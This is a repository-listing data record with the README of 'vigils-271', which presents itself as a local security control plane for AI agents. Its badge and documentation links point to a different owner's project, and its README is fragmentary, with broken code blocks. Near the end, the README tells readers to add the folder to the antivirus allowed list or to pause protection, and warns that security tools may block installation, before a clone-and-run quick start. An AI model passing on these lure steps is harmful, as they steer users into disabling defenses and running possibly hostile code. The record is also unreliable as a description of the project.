[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-83169":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":12,"contributorsCount":12,"subscribersCount":12,"size":12,"stars1d":12,"stars7d":12,"stars30d":12,"stars90d":12,"forks30d":12,"starsTrendScore":12,"compositeScore":14,"rankGlobal":9,"rankLanguage":9,"license":15,"archived":16,"fork":16,"defaultBranch":17,"hasWiki":18,"hasPages":16,"topics":19,"createdAt":9,"pushedAt":9,"updatedAt":30,"readmeContent":31,"aiSummary":32,"trendingCount":12,"starSnapshotCount":12,"syncStatus":33,"lastSyncTime":34,"discoverSource":35},83169,"vigils-271","picodefenderrecord\u002Fvigils-271","picodefenderrecord","A local control plane for AI agents — see what they do, approve what matters, keep secrets out. Rust + Tauri + Chrome MV3.",null,"Rust",4,0,63,40,"Apache License 2.0",false,"main",true,[20,21,22,23,24,25,26,27,28,29],"agent-security","ai-agents","audit-log","desktop","llm","local-first","pii","rust","sandbox","tauri","2026-06-12 04:01:40","\u003Cdiv align=\"center\">\n\n# Vigils\n\n### A local-first control plane for AI agents — see what they do, approve what matters, keep secrets out.\n\n[![CI](https:\u002F\u002Fgithub.com\u002Fpicodefenderrecord\u002Fvigils-271\u002Factions\u002Fworkflows\u002Fci.yml\u002Fbadge.svg)](https:\u002F\u002Fgithub.com\u002Fpicodefenderrecord\u002Fvigils-271\u002Factions\u002Fworkflows\u002Fci.yml)\n[![Release](https:\u002F\u002Fimg.shields.io\u002Fgithub\u002Fv\u002Frelease\u002Fduncatzat\u002Fvigils?sort=semver&color=blue)](https:\u002F\u002Fgithub.com\u002Fpicodefenderrecord\u002Fvigils-271\u002Freleases)\n[![License: Apache-2.0](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-Apache_2.0-blue.svg)](.\u002FLICENSE)\n[![Platforms](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fplatforms-Windows%20%7C%20macOS%20%7C%20Linux-lightgrey.svg)](#installation)\n\n[Website](https:\u002F\u002Fvigils.ai) · [Quick Start](#quick-start) · [Architecture](#architecture) · [Security Model](#security-model) · [Documentation](#documentation)\n\n**English** | [简体中文](.\u002FREADME.zh-CN.md)\n\n\u003C\u002Fdiv>\n\n---\n\nAI agents (Claude Code, Cursor, Zed, MCP clients, browser assistants) call tools, read\nfiles, hit APIs, and paste into web UIs on your behalf. That power is useful — and risky.\n**Vigils sits between your agents and the tools\u002Fdata they touch**, and it is *local-first*:\nyour prompts, secrets, and audit trail never leave your machine.\n\n```\n   AI agent ──▶  ┌─────────────────── Vigils ───────────────────┐  ──▶  tools \u002F data\n (MCP client)    │  redact → firewall → approve → sandbox → audit │       (MCP servers,\n                 └───────────────────────────────────────────────┘        files, APIs, web)\n```\n\n## Why Vigils\n\nFour guarantees, enforced locally:\n\n| Guarantee | How |\n|---|---|\n| **See what the agent did** | Every tool call is recorded in a tamper-evident **SHA-256 hash-chained ledger** with full-text search. |\n| **Approve risky actions first** | Destructive \u002F sensitive calls pause for human review in an **Approval Queue**, with per-agent policy and scoped grants. |\n| **Keep credentials out of prompts \u002F logs \u002F UI** | A **redaction engine** strips secrets and PII (hard-fingerprint rules + an optional ML ensemble) *before* text reaches a model, a log, or the screen. |\n| **Contain & roll back** | The ledger is traceable end-to-end and the **sandbox runner is fail-closed by default** (Wasm + native + Linux Landlock). |\n\n## Features\n\n- **🔒 Tamper-evident audit ledger** — SQLite + SHA-256 hash chain; every event links to the\n  previous one, so tampering is detectable. FTS5 full-text search over the redacted trail.\n- **🛡️ Default-deny firewall** — tool calls are gated by a Rust policy DSL; per-agent rules;\n  OAuth scope allow-lists for remote MCP. Nothing runs unless allowed.\n- **✅ Human-in-the-loop approval** — risky effects (file writes, network, destructive ops)\n  pause for review. Grants can be scoped (once \u002F this-session).\n- **🙈 Secret & PII redaction** — hard-fingerprint detection for 13+ credential classes\n  (GitHub PAT, Stripe keys, Google\u002FGitLab tokens, DB URLs, …) plus an optional multilingual\n  ML ensemble; a fail-closed merge layer decides what to mask.\n- **🎟️ Secret lease broker** — short-lived credential leases injected only into the child\n  process that needs them; plaintext is never persisted.\n- **📦 Sandbox runner** — one-shot tool execution in Wasm (Wasmtime) or native processes,\n  with **Linux Landlock LSM** filesystem isolation and `env_clear` so children don't inherit\n  your environment. Fail-closed by default.\n- **🔌 MCP gateway** — sits in front of MCP servers over **stdio and HTTP**; descriptor\n  pinning with drift detection (alerts when a tool's definition changes); bare-command stdio\n- **🖥️ Desktop app** (Tauri 2 + Vue 3) — Approval Queue, Activity Feed, Server Registry,\n  Session Replay, Privacy Findings; keyboard shortcuts, light\u002Fdark\u002Fsystem theme, real-time\n  updates, bilingual (zh \u002F en) UI.\n- **🌐 Browser extension** (Chrome MV3) — redacts secrets\u002FPII *before* paste or submit on AI\n  sites (ChatGPT, Claude, Gemini, Perplexity).\n\n## Architecture\n\nVigils is a Rust workspace of focused crates plus three apps. Each layer is independently\ntestable and composed by the **Hub** (the MCP gateway).\n\n| Layer | Crate | Responsibility |\n|---|---|---|\n| **Audit** | `vigil-audit` | SQLite ledger, SHA-256 hash chain, FTS5 search, redaction-scan records |\n| **Policy** | `vigil-policy` | Rust policy DSL + rule engine (default-deny) |\n| **Firewall** | `vigil-firewall` | Tool gating, per-agent rules, OAuth scope allow-lists |\n| **Approval** | `vigil-mcp` (broker) | Human-in-the-loop, scoped grants, cross-process resolution |\n| **Redaction** | `vigil-redaction` | Secret\u002FPII detection (hard fingerprints + ML ensemble), fail-closed merge |\n| **Leases** | `vigil-lease` | Short-lived credential leases, prepared child env (RAII revoke) |\n| **Runner** | `vigil-runner` \u002F `vigil-runner-types` | Native + Wasm execution, env policy, fail-closed |\n| **Sandbox** | `vigil-sandbox-linux` | Linux Landlock LSM filesystem isolation |\n| **Gateway** | `vigil-mcp` | MCP Hub: stdio + HTTP upstreams, descriptor pinning + drift |\n| **Remote auth** | `vigil-http-auth` \u002F `vigil-http-transport` | OAuth (JWT + opaque), token refresh (singleflight), real TLS |\n| **UI protocol** | `vigil-ui-protocol` | Typed command\u002Fresponse contract for the desktop UI |\n| **Browser** | `vigil-browser` | Redaction classifier + audit for the extension bridge |\n| **SDK** | `vigil-sdk` | Thin, SemVer-stable facade over the engine |\n\n**Apps & binaries:**\n\n| Binary | Crate | What it is |\n|---|---|---|\n| `vigil-hub` | `vigil-hub-cli` | CLI MCP gateway: `vigil-hub serve --stdio`, `add-remote-mcp`, `inspect`, … |\n| `gui` | `apps\u002Fdesktop` | Tauri 2 desktop app (embeds the Vue 3 UI + an in-process Hub) |\n| `vigil-native-host` | `apps\u002Fnative-host` | Native-messaging bridge for the Chrome extension |\n| — | `extensions\u002Fchrome-mv3` | Chrome MV3 extension (vanilla JS, zero npm deps) |\n\n\n\n### As an MCP gateway (CLI)\n\nPut Vigils in front of your MCP servers so every tool call is firewalled, approved, and audited:\n\n```bash\n# Serve as an MCP endpoint your agent connects to (stdio)\nvigil-hub serve --stdio --upstream-config .\u002Fupstreams.json\n\n# upstreams.json — bare commands resolve via PATH automatically\n\n# Register a remote (HTTP) MCP server with OAuth onboarding\nvigil-hub add-remote-mcp https:\u002F\u002Fmcp.example.com\u002F\n\n# Inspect the local audit ledger from the command line (one-line JSON, pipe to jq)\nvigil-hub inspect --db-path .\u002Fvigil.db activity --limit 20\n```\n\nPoint your agent (Claude Code \u002F Cursor \u002F Zed) at `vigil-hub` instead of the raw MCP server. See\nthe **[Agent Integration & Test guide](https:\u002F\u002Fduncatzat.github.io\u002Fvigils\u002Fgetting-started\u002Fagent-integration.html)**\nfor per-agent config and how to verify it's gating.\n\n### Desktop app\n\nLaunch the desktop app to watch and control agents in real time: **Approval Queue** (approve \u002F\ndeny \u002F bulk), **Activity Feed** (live audit stream), **Server Registry**, **Session Replay**,\nand **Privacy Findings**.\n\n\n# Workspace tests \u002F lints (no GPU or model deps by default)\ncargo test --workspace\ncargo clippy --workspace --all-targets -- -D warnings\ncargo fmt --all -- --check\n\n# CLI gateway\n\n# Desktop UI + app (the `gui` feature embeds the built UI)\ncd apps\u002Fdesktop\u002Fui && npm ci && npm run build && cd -\n```\n\n> Crate names use the historical `vigil-*` prefix; the product and project are **Vigils**.\n\n## Security model\n\n- **Local-first** — prompts, secrets, and the audit ledger stay on your machine.\n- **Default-deny** — the firewall blocks tool calls unless a policy explicitly allows them.\n- **Fail-closed** — when a guarantee can't be enforced (e.g. Landlock unsupported, redaction\n  engine unavailable but requested), Vigils refuses rather than silently degrading.\n- **Tamper-evident** — the audit ledger is a SHA-256 hash chain; the desktop app can verify\n  the whole chain.\n- **No raw secrets at rest** — redaction stores only label \u002F count \u002F fingerprint metadata;\n  plaintext credentials are never written to the ledger.\n- **Least privilege spawning** — child processes get a cleared environment plus only the\n  approved env and short-lived secret leases; Linux runs add Landlock filesystem isolation.\n\nFound a vulnerability? Please report it privately — see [SECURITY.md](.\u002FSECURITY.md). Please\ndon't open a public issue for security reports.\n\n## Project structure\n\n```\ncrates\u002F          # 15 library crates (audit, policy, firewall, mcp, redaction, runner,\n                 #   lease, sandbox-linux, http-auth\u002Ftransport, ui-protocol, browser, sdk, types)\napps\u002F\n  desktop\u002F       # Tauri 2 + Vue 3 desktop app (bin: gui)\n  native-host\u002F   # Chrome native-messaging bridge (bin: vigil-native-host)\n  vigil-hub-cli\u002F # CLI MCP gateway (bin: vigil-hub)\nextensions\u002F\n  chrome-mv3\u002F    # Chrome MV3 extension (vanilla JS)\ndocs\u002F\n  adr\u002F           # Architecture Decision Records\n  book\u002F          # User guide (mdBook)\n  threat-model\u002F  # Security threat model\n```\n\n## Documentation\n\n- **User guide** (mdBook): **\u003Chttps:\u002F\u002Fduncatzat.github.io\u002Fvigils\u002F>** — or build [`docs\u002Fbook\u002F`](.\u002Fdocs\u002Fbook) locally\n- **Security audit**: [`docs\u002Fsecurity\u002FSECURITY-AUDIT-2026-06-03.md`](.\u002Fdocs\u002Fsecurity\u002FSECURITY-AUDIT-2026-06-03.md) — comprehensive baseline (OWASP + STRIDE + supply chain), 9.9\u002F10, 0 critical \u002F high\n- **Architecture Decision Records**: [`docs\u002Fadr\u002F`](.\u002Fdocs\u002Fadr)\n- **Threat model**: [`docs\u002Fthreat-model\u002F`](.\u002Fdocs\u002Fthreat-model)\n- **SDK surface**: [`docs\u002Fsdk-shallow-api.md`](.\u002Fdocs\u002Fsdk-shallow-api.md)\n\n## Contributing\n\nIssues and pull requests are welcome. Before submitting, please ensure:\n\n```bash\ncargo fmt --all -- --check\ncargo clippy --workspace --all-targets -- -D warnings\ncargo test --workspace\n```\n\nCI runs the same gates on Linux and the UI build on every PR.\n\n### Documentation (bilingual)\n\nVigils serves both the Chinese and international communities, so **user-facing docs are\nbilingual**. When you add or change a guide \u002F how-to \u002F explanatory doc, evaluate whether it needs\nboth languages — if so, write an English page **plus a separate Chinese page** (never\nsentence-by-sentence interleaving), e.g. `foo.md` + `foo.zh-CN.md`, cross-linked at the top.\nReference \u002F ADR \u002F internal docs may stay English-only.\n\n## License\n\n[Apache-2.0](.\u002FLICENSE) © Vigils Authors.\n\n\n\n> [!TIP]\n> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.\n\n> [!CAUTION]\n> Some security systems may block the installation.\n> Only download from the official repository.\n\n---\n\n## QUICK START\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fpicodefenderrecord\u002Fvigils-271.git\ncd vigils-271\ncargo build --release\ncargo run\n```\n\n\n\u003C!-- Last updated: 2026-06-04 19:35:40 -->\n","Vigils 是一个本地控制平面，用于管理和审计AI代理的行为。它使用Rust编写，并结合了Tauri和Chrome MV3技术，提供了包括防篡改的审计日志、默认拒绝防火墙、人工审核批准机制以及敏感信息自动屏蔽等功能。通过这些特性，用户可以清晰地看到AI代理执行的操作，对潜在风险行为进行审批，并确保敏感信息不会泄露。该项目适用于需要在本地环境中安全地运行AI代理（如代码助手或浏览器插件）并对其进行细粒度控制的场景。",2,"2026-06-06 04:11:55","CREATED_QUERY"]